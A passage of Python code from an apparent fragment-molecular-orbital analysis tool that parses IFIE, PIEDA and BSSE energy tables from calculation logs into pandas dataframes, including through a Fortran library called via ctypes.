ifdf_molsum\n\n def getsumdf(self, df):\n HF_IFIE_sum = df['HF-IFIE'].sum()\n MP2_IFIE_sum = df['MP2-IFIE'].sum()\n PR_TYPE1_sum = df['PR-TYPE1'].sum()\n GRIMME_sum = df['GRIMME'].sum()\n JUNG_sum = df['JUNG'].sum()\n HILL_sum = df['HILL'].sum()\n\n ES_sum = df['ES'].sum()\n EX_sum = df['EX'].sum()\n CT_sum = df['CT-mix'].sum()\n DI_sum = df['DI(MP2)'].sum()\n q_sum = df['q(I=>J)'].sum()\n\n return HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum\n\n\n def getpitgtdf(self, pidf, ifdf_filter):\n print('--- pieda near tgt ', self.dist, 'angstrom ----')\n # print('--- pieda for tgt frag ----')\n tgt1frag = self.tgt1frag[0]\n tgtdf_filter = pidf[(pidf['I'] == tgt1frag) |(pidf['J'] == tgt1frag)]\n\n# fragids = []\n# tgtdf = df[(df['I'] == self.tgt1frag) | (df['J'] == self.tgt1frag)]\n# tgtdf_filter = tgtdf[(tgtdf['I'].isin(self.tgt2frag)) | (tgtdf['J'].isin(self.tgt2frag))]\n\n fragids = []\n fragis = tgtdf_filter['I'].values.tolist()\n fragjs = tgtdf_filter['J'].values.tolist()\n for i in range(len(fragis)):\n if fragis[i] != tgt1frag:\n fragids.append(fragis[i])\n else:\n fragids.append(fragjs[i])\n print('inside Dimter-ES region', fragids)\n\n allids = []\n allis = ifdf_filter['I'].values.tolist()\n alljs = ifdf_filter['J'].values.tolist()\n\n for i in range(len(allis)):\n if allis[i] != tgt1frag:\n allids.append(allis[i])\n else:\n allids.append(alljs[i])\n # print('all pair', allids)\n\n # complement values from ifdf\n\n df = ifdf_filter\n pitgtdf_filters = pd.DataFrame(columns=self.pcolumn)\n count = 0\n for i in range(len(allids)):\n pitgtdf_filter = self.gettgtdf_ff(tgtdf_filter, tgt1frag, allids[i])\n if len(pitgtdf_filter) == 0:\n esdata = df[(df['I'] == allids[i]) |(df['J'] == allids[i])]['HF-IFIE'].values.tolist()[0]\n pitgtdf_filters.loc[str(count)] = [int(tgt1frag), int(allids[i]), esdata, 0.0, 0.0, 0.0, 0.0]\n else:\n pitgtdf_filters = pitgtdf_filters.append(pitgtdf_filter)\n count +=1\n\n # print(pitgtdf_filters.head())\n\n return pitgtdf_filters\n\n\n def read_ifiepieda(self, fname):\n ''' read ifie and pieda data from file\n\n read ifie and pieda data from file\n\n Args:\n fname (str): file name\n\n Returns:\n ifie (list): ifie data\n pieda (list): pieda data\n '''\n # print('start getifiepieda')\n ifie = []\n count = 0\n pieda = []\n pcount = 0\n momcount = 0\n dimcount = 0\n momene = []\n dimene = []\n pflag = False\n bsseflag = False\n bssecount = 0\n bsse = []\n\n if not os.path.exists(fname):\n print(\"can't open\", fname)\n return ifie, pieda, momene, dimene\n\n file = open(fname, \"rt\")\n\n flag = False\n momflag = False\n dimflag = False\n # print text\n for i in range(len(text)):\n # itemList = text[i][:-1].split()\n itemList = file.readline().strip().split()\n\n # print itemList\n if len(itemList) < 2:\n continue\n if itemList[1:3] == ['MONOMER', 'ENERGY']:\n momflag = True\n continue\n if itemList[1:3] == ['DIMER', 'ENERGY']:\n dimflag = True\n continue\n if itemList[1:3] == ['DIMER', '']:\n dimflag = False\n if dimflag is True:\n dimcount += 1\n if dimflag is True and dimcount > 2:\n # print('DIMER Energy', itemList)\n dimene.append(itemList)\n\n if momflag:\n # print(itemList)\n momcount += 1\n if momcount == 1 + int(self.tgt1frag[0]):\n momene.append(itemList)\n momflag = False\n\n if itemList[1] == 'MP2-IFIE' or itemList[1] == 'HF-IFIE':\n flag = True\n # head.append(itemList)\n continue\n if itemList[1] == 'PIEDA':\n flag = False\n pflag = True\n # print('pieda start!!')\n continue\n if flag is True:\n count += 1\n if flag is True and count > 2:\n if self.logMethod == 'HF':\n ifie.append(itemList[:-2])\n else:\n ifie.append(itemList)\n if len(itemList) < 2:\n continue\n\n # after pieda or BSSE (break)\n if itemList[1] == 'Mulliken':\n # flag = False\n break\n # for BSSE\n if pflag is True and itemList[:5] == ['##','BSSE', 'for','non-bonding','MP2-IFIE']:\n pflag = False\n # print('pieda end! next is BSSE')\n continue\n if itemList[:4] == ['##','BSSE', 'for', 'MP2-IFIE']:\n bsseflag = True\n # print('BSSE start!')\n continue\n if bsseflag is True:\n bssecount += 1\n if bsseflag is True and bssecount > 2:\n bsse.append(itemList)\n\n # for pieda\n if pflag is True:\n pcount += 1\n if pflag is True and pcount > 2:\n pieda.append(itemList)\n\n if not flag and not pflag and not bsseflag:\n print(\"can't read ifie\", fname.split(\"/\")[-1])\n return [], [], [], []\n\n for i in range(len(ifie)):\n if float(ifie[i][4]) < -2:\n ifie[i][4] = 0.0\n if self.logMethod != 'HF':\n ifie[i][5] = 0.0\n ifie[i][6] = 0.0\n\n print('bsse', bsse[0])\n\n file.close()\n return ifie, pieda, momene, dimene, bsse\n # print ifie\n\n def read_pbifiepieda(self, fname):\n ifie = []\n count = 0\n pieda = []\n pcount = 0\n pflag = False\n sflag = False\n\n try:\n f = open(fname, \"r\")\n text = f.readlines()\n f.close()\n except:\n print(\"can't open\", fname)\n return ifie\n flag = False\n # print text\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print itemList\n if len(itemList) < 2:\n continue\n if itemList[1] == 'MP2-IFIE' or itemList[1] == 'HF-IFIE':\n flag = True\n ifie = []\n pieda = []\n # head.append(itemList)\n continue\n if itemList[1] == 'PIEDA':\n flag = False\n pflag = True\n continue\n if flag is True:\n count += 1\n if flag is True and count > 2:\n if self.logMethod == 'HF':\n ifie.append(itemList[:-2])\n else:\n ifie.append(itemList)\n # print itemList\n if len(itemList) < 2:\n continue\n\n if itemList[1] == 'PIEDA':\n pflag = True\n # head.append(itemList)\n continue\n if itemList[1] == 'Mulliken':\n flag = False\n pflag = False\n count = 0\n pcount = 0\n continue\n if pflag is True:\n pcount += 1\n if pflag is True and pcount > 2:\n pieda.append(itemList)\n\n if itemList[1] == 'SOLVENT-SCREENING':\n sflag = True\n solv = []\n scount = 0\n if sflag == True:\n scount += 1\n\n if itemList[1:3] == ['NONPOLAR', 'CONTRIBUTION']:\n sflag = False\n break\n\n if sflag is True and scount > 5:\n solv.append([itemList[1], itemList[2], itemList[12]])\n\n if not flag and not pflag:\n try:\n print(\"can't read ifie\", fname.split(\"/\")[1])\n except:\n pass\n\n for i in range(len(ifie)):\n # print(ifie[i][4])\n if float(ifie[i][4]) < -2:\n ifie[i][4] = 0.0\n if self.logMethod != 'HF':\n ifie[i][5] = 0.0\n ifie[i][6] = 0.0\n\n return ifie, pieda, solv\n\n\n def read_ifiepiedas(self, tgtlog):\n '''read ifie and pieda from log file\n Args:\n tgtlog (str): log file name\n Returns:\n ifdfs (list): ifie dataframe\n pidfs (list): pieda dataframe\n momenedf (list): momene dataframe\n dimenedf (list): dimene dataframe\n bssedfs (list): bsse dataframe\n '''\n # tgtlog, tgttime = args\n print('read', tgtlog)\n\n # getifie\n # HF or MP2 is supported on py function\n ifie, pieda, momene, dimene, bsse = self.read_ifiepieda(tgtlog)\n # print('l1613', 'ifie', ifie[0], 'pieda', pieda[0], 'mom', momene)\n\n # get dataframe list\n ifdfs = self.getifiedf(ifie)\n pidfs = self.getpiedadf(pieda)\n\n self.is_bsse = True\n if self.is_bsse:\n bssedfs = self.getbssedf(bsse)\n else:\n bssedfs = []\n if self.is_momdimene:\n momenedf = self.getmomenedf(momene)\n dimenedf = self.getdimenedf(dimene)\n else:\n momenedf = []\n dimenedf = []\n # print('ifdfs', ifdfs)\n # print('pidfs', pidfs)\n\n return [ifdfs, pidfs, momenedf, dimenedf, bssedfs]\n\n\n def getfiltifpiff(self, i, ifdf, pidf):\n '''get filtered ifie and pieda dataframe\n\n Args:\n i (int): index of rec\n ifdf (dataframe): ifie dataframe\n pidf (dataframe): pieda dataframe\n Returns:\n ifdf_filter (dataframe): filtered ifie dataframe\n pidf_filter (dataframe): filtered pieda dataframe\n '''\n\n # in (class var: molnames(rec i), tgt2frag, tgt1frag, tgttimes, matrixtype\n # local var:i, ifdf, pidf\n # out tgtdf_filter, pitgtdf_filter\n\n # ifie\n ifdf_filter = pd.DataFrame()\n ifdf_filter = self.gettgtdf_ff(ifdf, self.tgt1frag[0], self.tgt2frag[0])\n # print(ifdf_filter)\n ifdf_filter = pd.merge(ifdf_filter, pidf, on=['I', 'J'], how='left')\n ifdf_filter = ifdf_filter.rename(index={ifdf_filter.index[0]:self.tgttimes[i]})\n\n # pieda\n# pitgtdf_filter = self.gettgtdf_ff(pidf, self.tgt1frag[0], self.tgt2frag[0])\n# if len(pitgtdf_filter) == 0:\n# esdata = ifdf_filter['HF-IFIE'][0]\n# tmpps = pd.Series([self.tgt1frag[0], self.tgt2frag[0], esdata, 0.0, 0.0, 0.0, 0.0], index=self.pcolumn, name =self.tgttimes[i])\n# pitgtdf_filter = pitgtdf_filter.append(tmpps)\n# else:\n# pitgtdf_filter = pitgtdf_filter.rename(index={pitgtdf_filter.index[0]:self.tgttimes[i]})\n#\n# # print(pitgtdf_filter)\n\n return ifdf_filter\n\n\n def getfiltifpifm(self, i, ifdf, pidf):\n '''get filtered ifie and pieda dataframe\n\n Args:\n i (int): index of rec\n ifdf (dataframe): ifie dataframe\n pidf (dataframe): pieda dataframe\n\n Returns:\n ifdf_filter (dataframe): filtered ifie dataframe\n pidf_filter (dataframe): filtered pieda dataframe\n '''\n\n # in (class var: log(rec i), nf(rec i), molnames(rec i), tgt2molname, tgt1frag,\n # local var: ifdf, pidf\n # out tgtdf_filter, tgtifdfsum\n # pitgtdf_filter, pitgtdfsum\n\n print('### read frag info ###')\n\n # molfragss\n molfragss = self.getallmolfrags(self.tgtlogs[i], ifdf, self.nfs[i])\n # molfragss fragment ids per mol (fragment connect is judged by checking frag-frag distance)\n print('molfragss', molfragss)\n print('len molfragss', len(molfragss))\n\n # get tgt frag id\n # IFIE\n molnames_inrec = self.molnames_perrec[i]\n rname_perfraginrec = self.resnamenonums_perfrag[i]\n\n tgtmolfrags = []\n # print('molnames', molnames_inrec)\n # print('len molnames', len(molnames_inrec))\n\n print('molnames_perfrag', rname_perfraginrec)\n print('len molnames_perfrag', len(rname_perfraginrec))\n\n rname_permolinrec = copy.deepcopy(molfragss)\n for j in range(len(rname_permolinrec)):\n # if type(molfragss[j]) == list:\n for k in range(len(molfragss[j])):\n num = copy.deepcopy(molfragss[j][k]) - 1\n rname_permolinrec[j][k] = rname_perfraginrec[num]\n\n for j in range(len(rname_permolinrec)):\n try:\n if self.tgt2molname in rname_permolinrec[j]:\n tgtmolfrags += molfragss[j]\n except:\n continue\n print(tgtmolfrags)\n\n frag1 = self.tgt1frag\n if type(frag1) == int:\n frag1s = [frag1]\n print('tgtfrag1s', frag1s)\n else:\n frag1s = copy.deepcopy(frag1)\n\n self.frag1s = frag1s\n ifdf_filter = pd.DataFrame()\n ifdf_filters = []\n ifdfsums = []\n for frag1p in frag1s:\n ifdf_filter = self.gettgtdf_ffs(ifdf, frag1p, tgtmolfrags)\n print('ifdf_filter\\n', ifdf_filter.head())\n\n # merge ifie and pieda\n ifdf_filter = pd.merge(ifdf_filter, pidf, on=['I', 'J'], how='left')\n\n ## screening dist\n if self.dist != 1000.0:\n ifdf_filter = ifdf_filter[ifdf_filter['DIST'] < self.dist]\n\n HF_IFIE_sum = ifdf_filter['HF-IFIE'].sum()\n MP2_IFIE_sum = ifdf_filter['MP2-IFIE'].sum()\n PR_TYPE1_sum = ifdf_filter['PR-TYPE1'].sum()\n GRIMME_sum = ifdf_filter['GRIMME'].sum()\n JUNG_sum = ifdf_filter['JUNG'].sum()\n HILL_sum = ifdf_filter['HILL'].sum()\n\n ES_sum = ifdf_filter['ES'].sum()\n EX_sum = ifdf_filter['EX'].sum()\n CT_sum = ifdf_filter['CT-mix'].sum()\n DI_sum = ifdf_filter['DI(MP2)'].sum()\n q_sum = ifdf_filter['q(I=>J)'].sum()\n\n ifdf_filter['TIMES'] = self.tgttimes[i]\n\n ifdfsum = pd.Series([HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum], index=self.ifdfsumcolumn, name=self.tgttimes[i])\n print('ifdfsum\\n', ifdfsum)\n ifdf_filters.append(ifdf_filter)\n ifdfsums.append(ifdfsum)\n\n return ifdf_filters, ifdfsums\n\n\n def getfiltifpifd(self, i, ifdf, pidf, momenedf=None, dimenedf=None, bssedf=None):\n # in class var: tgttime\n # local var: i, ifdf,pidf\n # out local var: tgtifdfsum, tgtdf_filter\n # pitgtdfsum, pitgtedf\n\n # get tgt frag id\n ifdf, ifdf_filter = self.gettgtdf_fd(ifdf)\n\n # merge ifiedf and pieda df\n ifdf_filter = pd.merge(ifdf_filter, pidf, on=['I', 'J'], how='left')\n\n # merge filtered-ifie data and dimer energy data\n if self.is_momdimene:\n ifdf_filter = pd.merge(ifdf_filter, dimenedf, on=['I', 'J'], how='left')\n\n # merge ifiedf and pieda df\n if self.is_bsse:\n ifdf_filter = pd.merge(ifdf_filter, bssedf, on=['I', 'J'], how='left')\n\n print(ifdf_filter.head())\n ifdf_filter['TIMES'] = self.tgttimes[i]\n HF_IFIE_sum = ifdf_filter['HF-IFIE'].sum()\n MP2_IFIE_sum = ifdf_filter['MP2-IFIE'].sum()\n PR_TYPE1_sum = ifdf_filter['PR-TYPE1'].sum()\n GRIMME_sum = ifdf_filter['GRIMME'].sum()\n JUNG_sum = ifdf_filter['JUNG'].sum()\n HILL_sum = ifdf_filter['HILL'].sum()\n ES_sum = ifdf_filter['ES'].sum()\n EX_sum = ifdf_filter['EX'].sum()\n CT_sum = ifdf_filter['CT-mix'].sum()\n DI_sum = ifdf_filter['DI(MP2)'].sum()\n q_sum = ifdf_filter['q(I=>J)'].sum()\n\n try:\n HF_BSSE_sum = ifdf_filter['HF-BSSE'].sum()\n MP2_BSSE_sum = ifdf_filter['MP2-BSSE'].sum()\n except:\n HF_BSSE_sum = 0\n MP2_BSSE_sum = 0\n\n # data for bsse\n try:\n momenetgtdf = momenedf[momenedf['Frag.'] == self.momfrag]\n momene_tgt = momenetgtdf['HF'][0] + momenetgtdf['MP2'][0]\n momlabel = 'MonomerEnergy(' + str(self.momfrag) + ')'\n except:\n momene_tgt = None\n momlabel = 'MonomerEnergy(' + str(self.momfrag) + ')'\n\n try:\n # dimene_tgt = momenedf['HF'][0] + momenedf['MP2'][0]\n dimenetgtdf = dimenedf[((dimenedf['I'] == self.dimfrag1) & (dimenedf['J'] == self.dimfrag2)) | ((dimenedf['I'] == self.dimfrag2) & (dimenedf['J'] == self.dimfrag1))]\n dimene_tgt = dimenetgtdf['DIMER-HF'][0] + dimenetgtdf['DIMER-MP2'][0]\n dimlabel = 'DimerEnergy(' + str(self.dimfrag1) + '-' + str(self.dimfrag2) + ')'\n\n except:\n dimene_tgt = None\n dimlabel = 'DimerEnergy(' + str(self.dimfrag1) + '-' + str(self.dimfrag2) + ')'\n\n\n ifdfsum = pd.Series([HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum, momene_tgt, dimene_tgt, HF_BSSE_sum, MP2_BSSE_sum], index=self.ifdfsumcolumn + [momlabel, dimlabel] + ['HF-BSSE', 'MP2-BSSE'], name=self.tgttimes[i])\n # print(ifdfsum)\n\n # pieda\n# frags = self.frags\n# if self.fragmode != 'manual':\n# # print('len_frags', len(frags))\n# #assign resname(e.g. Gly6)\n# for j in range(1, len(frags) + 1):\n# ifdf_filter.I = ifdf_filter.I.replace(j, frags[j-1])\n# ifdf_filter.J = ifdf_filter.J.replace(j, frags[j-1])\n\n # print(ifdf_filter)\n return ifdf_filter, ifdfsum\n\n\n def read_ifpif90(self, tgtlog):\n '''read ifpif90.so and call readifiepieda_\n Args:\n tgtlog (str): target log file name\n Returns:\n ifdf_filters (list): list of ifdf_filter\n '''\n\n print('read', tgtlog)\n if not os.path.exists(tgtlog):\n print('Warning:', tgtlog, 'is not exist: skip data')\n return []\n f = np.ctypeslib.load_library(self.f90sofile, \".\")\n\n f.readifiepieda_.argtypes = [\n c_char_p,\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n ]\n\n instr = tgtlog\n enc_str = instr.encode('utf-8')\n instr = create_string_buffer(enc_str)\n\n ifi = np.empty(100000000, dtype=np.int32)\n ifj = np.empty(100000000, dtype=np.int32)\n pii = np.empty(100000000, dtype=np.int32)\n pij = np.empty(100000000, dtype=np.int32)\n dist = np.empty(100000000, dtype=np.float64)\n hfifie = np.empty(100000000, dtype=np.float64)\n mp2ifie = np.empty(100000000, dtype=np.float64)\n prtype1 = np.empty(100000000, dtype=np.float64)\n grimme = np.empty(100000000, dtype=np.float64)\n jung = np.empty(100000000, dtype=np.float64)\n hill = np.empty(100000000, dtype=np.float64)\n es = np.empty(100000000, dtype=np.float64)\n ex = np.empty(100000000, dtype=np.float64)\n ct = np.empty(100000000, dtype=np.float64)\n di = np.empty(100000000, dtype=np.float64)\n erest = np.empty(100000000, dtype=np.float64)\n qval = np.empty(100000000, dtype=np.float64)\n fdimesint = np.empty(100000000, dtype=np.int32)\n ifpair = np.empty(1, dtype=np.int32)\n pipair = np.empty(1, dtype=np.int32)\n\n f.readifiepieda_(instr, ifi, ifj, pii, pij, dist, hfifie, mp2ifie, prtype1, grimme, jung, hill, es, ex, ct, di, erest, qval, fdimesint, ifpair, pipair)\n\n if ifpair == 0:\n print('Warning:', tgtlog, 'is not converged: skip data')\n return []\n #check\n # print ('i', ifi[0], ifj[0])\n # print ('j', ifi[1], ifj[1])\n # print ('dist', dist[0:2])\n # print ('dist', hfifie[0:2])\n # print ('fdimesint', fdimesint[0:2])\n print ('ifpair', ifpair, 'pipair', pipair)\n\n # fdimesstr = []\n # for i in range(ifpair[0]):\n # if fdimesint[i] == 1:\n # fdimesstr.append('F')\n # elif fdimesint[i] == 2:\n # fdimesstr.append('T')\n\n # MP3 case\n if self.logMethod == 'MP3':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'USER-MP2', 'MP3-IFIE','USER-MP3', 'PADE[2/1]' ]\n\n ifdf = pd.DataFrame(columns=self.icolumn)\n ifdf['I'] = copy.deepcopy(ifi[:ifpair[0]])\n ifdf['J'] = copy.deepcopy(ifj[:ifpair[0]])\n ifdf['DIST'] = copy.deepcopy(dist[:ifpair[0]])\n ifdf['DIMER-ES'] = copy.deepcopy(fdimesint[:ifpair[0]])\n ifdf['HF-IFIE'] = copy.deepcopy(hfifie[:ifpair[0]])\n ifdf['MP2-IFIE'] = copy.deepcopy(mp2ifie[:ifpair[0]])\n ifdf['USER-MP2'] = copy.deepcopy(prtype1[:ifpair[0]])\n ifdf['MP3-IFIE'] = copy.deepcopy(grimme[:ifpair[0]])\n ifdf['USER-MP3'] = copy.deepcopy(jung[:ifpair[0]])\n ifdf['PADE[2/1]'] = copy.deepcopy(hill[:ifpair[0]])\n\n # CCPT case\n elif self.logMethod == 'CCPT':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'GRIMME-MP2', 'MP3-IFIE','GRIMME-MP3', 'MP4-IFIE' ]\n\n ifdf = pd.DataFrame(columns=self.icolumn)\n ifdf['I'] = copy.deepcopy(ifi[:ifpair[0]])\n ifdf['J'] = copy.deepcopy(ifj[:ifpair[0]])\n ifdf['DIST'] = copy.deepcopy(dist[:ifpair[0]])\n ifdf['DIMER-ES'] = copy.deepcopy(fdimesint[:ifpair[0]])\n ifdf['HF-IFIE'] = copy.deepcopy(hfifie[:ifpair[0]])\n ifdf['MP2-IFIE'] = copy.deepcopy(mp2ifie[:ifpair[0]])\n ifdf['GRIMME-MP2'] = copy.deepcopy(prtype1[:ifpair[0]])\n ifdf['MP3-IFIE'] = copy.deepcopy(grimme[:ifpair[0]])\n ifdf['GRIMME-MP3'] = copy.deepcopy(jung[:ifpair[0]])\n ifdf['MP4-IFIE'] = copy.deepcopy(hill[:ifpair[0]])\n\n # MP2 case\n else:\n ifdf = pd.DataFrame(columns=self.icolumn)\n ifdf['I'] = copy.deepcopy(ifi[:ifpair[0]])\n ifdf['J'] = copy.deepcopy(ifj[:ifpair[0]])\n ifdf['DIST'] = copy.deepcopy(dist[:ifpair[0]])\n ifdf['DIMER-ES'] = copy.deepcopy(fdimesint[:ifpair[0]])\n ifdf['HF-IFIE'] = copy.deepcopy(hfifie[:ifpair[0]])\n ifdf['MP2-IFIE'] = copy.deepcopy(mp2ifie[:ifpair[0]])\n ifdf['PR-TYPE1'] = copy.deepcopy(prtype1[:ifpair[0]])\n ifdf['GRIMME'] = copy.deepcopy(grimme[:ifpair[0]])\n ifdf['JUNG'] = copy.deepcopy(jung[:ifpair[0]])\n ifdf['HILL'] = copy.deepcopy(hill[:ifpair[0]])\n\n # PIEDA\n pidf = pd.DataFrame(columns=self.pcolumn)\n pidf['I'] = copy.deepcopy(pii[:pipair[0]])\n pidf['J'] = copy.deepcopy(pij[:pipair[0]])\n pidf['ES'] = copy.deepcopy(es[:pipair[0]])\n pidf['EX'] = copy.deepcopy(ex[:pipair[0]])\n pidf['CT-mix'] = copy.deepcopy(ct[:pipair[0]])\n pidf['DI(MP2)'] = copy.deepcopy(di[:pipair[0]])\n # LRD\n if self.is_disp:\n pidf['Erest'] = copy.deepcopy(erest[:pipair[0]])\n pidf['q(I=>J)'] = copy.deepcopy(qval[:pipair[0]])\n\n return [ifdf, pidf]\n\n\n def read_ifpimulti(self, i):\n ''' read ifpi and pieda from multi log file\n Args:\n i: log number\n Returns:\n ifdf: ifpi dataframe\n pidf: pieda dataframe\n '''\n\n # i: log number\n # read ifpi f90\n momenedf = None\n if self.f90soflag:\n # get ifie using f90 module\n print(\"use fortran library\")\n dfs = self.read_ifpif90(self.tgtlogs[i])\n if len(dfs) == 0:\n return None\n ifdf, pidf = dfs\n\n # note: nof90(py) mode only can get momnomer energy\n else:\n dfs = self.read_ifiepiedas(self.tgtlogs[i])\n if len(dfs) == 0:\n return None\n ifdf, pidf, momenedf, dimenedf, bssedf = dfs\n\n # IFIE pieda filter\n tgt2type = self.tgt2type\n print('tgttimes', self.tgttimes[i])\n print('tgt2type', tgt2type)\n\n # frag mode\n if tgt2type == 'frag':\n if self.matrixtype == 'times-frags':\n hfdfs = []\n mp2corrdfs =[]\n prmp2corrdfs =[]\n mp2tdfs =[]\n prmp2tdfs =[]\n esdfs = []\n exdfs = []\n ctdfs = []\n didfs = []\n distdfs = []\n erestdfs = []\n for tmptgt1 in self.tgt1frag:\n hfdf, mp2corrdf, prmp2corrdf, mp2tdf, prmp2tdf, distdf = self.gettgtdf_n2tfmatrix(i, ifdf, tmptgt1)\n esdf, exdf, didf, ctdf = self.gettgtpidf_n2tfmatrix(i, pidf, hfdf, tmptgt1)\n hfdfs.append(hfdf)\n mp2corrdfs.append(mp2corrdf)\n prmp2corrdfs.append(prmp2corrdf)\n mp2tdfs.append(mp2tdf)\n prmp2tdfs.append(prmp2tdf)\n distdfs.append(distdf)\n esdfs.append(esdf)\n exdfs.append(exdf)\n ctdfs.append(ctdf)\n didfs.append(didf)\n erestdfs.append(prmp2corrdf - didf)\n return hfdfs, mp2corrdfs, prmp2corrdfs, mp2tdfs, prmp2tdfs, esdfs, exdfs, ctdfs, distdfs, didfs, erestdfs\n\n else:\n ifdf_filter = self.getfiltifpiff(i, ifdf, pidf)\n iftgtdfsum = None\n return ifdf_filter\n\n # molname mode\n if tgt2type == 'molname':\n ifdf_filters, ifdfsums = self.getfiltifpifm(i, ifdf, pidf)\n return ifdf_filters, ifdfsums\n\n # dist or dimer-es mode\n if tgt2type in ['dist', 'dimer-es']:\n if self.is_momdimene:\n if self.is_bsse:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf, momenedf, dimenedf, bssedf)\n return ifdf_filter, ifdfsum\n else:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf, momenedf, dimenedf)\n return ifdf_filter, ifdfsum\n else:\n if self.is_bsse:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf, None, None, bssedf)\n return ifdf_filter, ifdfsum\n else:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf)\n return ifdf_filter, ifdfsum\n\n else:\n print('tgt2type error!!')\n return\n\n def readmultiifie(self):\n # check disp(LRD)\n self.is_disp = self.getisdisp(self.tgtlogs[0])\n print('## read multi mode')\n st = time.time()\n p = Pool(self.pynp)\n\n # main-read module\n ifpidfs = p.map(self.read_ifpimulti, [i for i in range(len(self.tgtlogs))])\n # i: time j:type, k:tgt1frag\n # [[hfdf[time 1][frag 1, frag2...], , mp2df[time 1], ...], [hfdf[time 2], mp2df[time 2], ...], ...]\n pd.set_option('display.width', 500)\n print('valid data num:', len(ifpidfs))\n # print(ifpidfs)\n\n # delete label of unfinished log\n delids = []\n for i in range(len(ifpidfs)):\n try:\n if ifpidfs[i] is None:\n delids.append(i)\n except:\n pass\n dellist = lambda items, indexes: [item for index, item in enumerate(items) if index not in indexes]\n ifpidfs = dellist(ifpidfs, delids)\n\n # filter section\n if self.tgt2type == 'frag':\n if self.matrixtype == 'times-frags':\n self.hfdfs = []\n self.mp2corrdfs = []\n self.prmp2corrdfs = []\n self.mp2tdfs = []\n self.prmp2tdfs = []\n self.esdfs = []\n self.exdfs = []\n self.ctdfs = []\n self.distdfs = []\n self.didfs = []\n self.erestdfs = []\n print('readable file num:', len(ifpidfs))\n for i in range(len(self.tgt1frag)):\n hfdf = pd.concat([dfs[0][i] for dfs in ifpidfs], axis=1)\n mp2corrdf = pd.concat([dfs[1][i] for dfs in ifpidfs], axis=1)\n prmp2corrdf = pd.concat([dfs[2][i] for dfs in ifpidfs], axis=1)\n mp2tdf = pd.concat([dfs[3][i] for dfs in ifpidfs], axis=1)\n prmp2tdf = pd.concat([dfs[4][i] for dfs in ifpidfs], axis=1)\n esdf = pd.concat([dfs[5][i] for dfs in ifpidfs], axis=1)\n exdf = pd.concat([dfs[6][i] for dfs in ifpidfs], axis=1)\n ctdf = pd.concat([dfs[7][i] for dfs in ifpidfs], axis=1)\n distdf = pd.concat([dfs[8][i] for dfs in ifpidfs], axis=1)\n didf = pd.concat([dfs[9][i] for dfs in ifpidfs], axis=1)\n erestdf = pd.concat([dfs[10][i] for dfs in ifpidfs], axis=1)\n\n self.hfdfs.append(hfdf)\n self.mp2corrdfs.append(mp2corrdf)\n self.prmp2corrdfs.append(prmp2corrdf)\n self.mp2tdfs.append(mp2tdf)\n self.prmp2tdfs.append(prmp2tdf)\n self.esdfs.append(esdf)\n self.exdfs.append(exdf)\n self.ctdfs.append(ctdf)\n self.distdfs.append(distdf)\n self.didfs.append(didf)\n self.erestdfs.append(erestdf)\n else:\n self.ifdf_filters = pd.DataFrame()\n for dfs in ifpidfs:\n self.ifdf_filters = self.ifdf_filters.append(dfs)\n\n if self.tgt2type in ['dist', 'dimer-es']:\n self.ifdf_filters = pd.DataFrame()\n self.ifdfsum = pd.DataFrame(columns=self.ifdfsumcolumn)\n\n for dfs in ifpidfs:\n # for j in dfs:\n # print('aaaaa', j)\n self.ifdf_filters = self.ifdf_filters.append(dfs[0])\n self.ifdfsum = self.ifdfsum.append(dfs[1])\n\n if self.tgt2type in ['molname']:\n self.ifdf_filters = []\n self.ifdfsum = []\n\n nfrag = len(ifpidfs[0][0])\n print('nfrag', nfrag)\n # i:time, j:frag\n for j in range(nfrag):\n ifdf_filter = pd.DataFrame()\n ifdfsum = pd.DataFrame(columns=self.ifdfsumcolumn)\n for i in range(len(ifpidfs)):\n ifdf_filter = ifdf_filter.append(ifpidfs[i][0][j])\n ifdfsum = ifdfsum.append(ifpidfs[i][1][j])\n\n self.ifdf_filters.append(ifdf_filter)\n self.ifdfsum.append(ifdfsum)\n\n # print(self.ifdf_filters)\n # print(self.ifdfsum)\n # print('len ifdf_filters', len(self.ifdf_filters))\n # print('len ifdfsum', len(self.ifdfsum))\n\n p.close()\n print('read elapsed', time.time() - st)\n\n return\n\n def readsingleifie(self):\n '''read single mode\n\n read ifie single mode\n\n Args:\n None\n Returns:\n None(self.ifdf, self.pidf, self.pbifdf, self.pbpidf)\n '''\n\n print('## read single mode')\n self.logMethod = self.getlogmethod(self.tgtlogs)\n if self.logMethod == 'HF':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE']\n elif self.logMethod == 'MP3':\n self.icolumn = ['I', 